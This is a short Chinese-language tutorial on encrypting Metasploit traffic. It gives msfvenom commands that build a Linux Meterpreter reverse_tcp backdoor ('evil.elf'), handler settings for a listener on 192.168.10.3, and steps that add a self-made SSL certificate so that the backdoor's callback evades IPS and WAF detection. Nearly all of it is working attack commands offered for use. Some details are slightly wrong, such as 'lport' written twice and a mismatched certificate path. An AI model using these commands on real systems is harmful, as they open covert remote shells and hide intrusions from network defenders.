流量加密之：MSF流量加密

流量加密之：MSF流量加密

目录

• 流量加密之：MSF流量加密
  • 1 背景
  • 2 生成SSL证书
  • 3 使用MSF生成带证书的后门
  • 4 验证流量

1 背景

• 在MSF中生成shell，并上线运行时。都是通过http https tcp等协议传输。虽然MSF本身会对流量进行加密，但MSF太出名以致于其加密特征容易被IPS，WAF等可以检测带有攻击的特征的设备拦截或记录。

  # kali配置nc监听
  use exploit/multi/handler
  set payload linux/x64/meterpreter/reverse_tcp
  set lhost 192.168.10.3
  
  # Centos主机反弹shell
  msfvenom -p linux/x64/meterpreter/reverse_tcp lport=192.168.10.3 lport=4444 -f elf -o evil.elf
  
  # 成功反弹后，执行命令，可以通过抓包查看在kali上所操作的命令
  

• 如下图所示：可以发现，虽然MSF已经将流量进行了加密，但其冗长的请示URI依然会暴露其恶意特征

  

2 生成SSL证书

kali上生成SSL证书的公钥/私钥对，需要填写的SSL证书信息可以是空，一直回车即可。

# openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
Generating a RSA private key
.........................................................................+++++
....+++++
writing new private key to 'key.pem'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
                  

3 使用MSF生成带证书的后门

# msfvenom -p linux/x64/meterpreter/reverse_tcp lport=192.168.10.3 lport=4444 PayloadUUIDTracking=true HandlerSSLCert=key.pem StagerVerifySSLCert=true PayloadUUIDName=EncFlows -f elf -o evil2.elf

# 配置带证书的MSF后门监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.10.3
set HandlerSSLCert Key/key.pem
set StagerVerifySSLCert true 

4 验证流量

• 流量被TLS加密了，我的wireshark不知道为啥将TLS流量识别为SSH流量。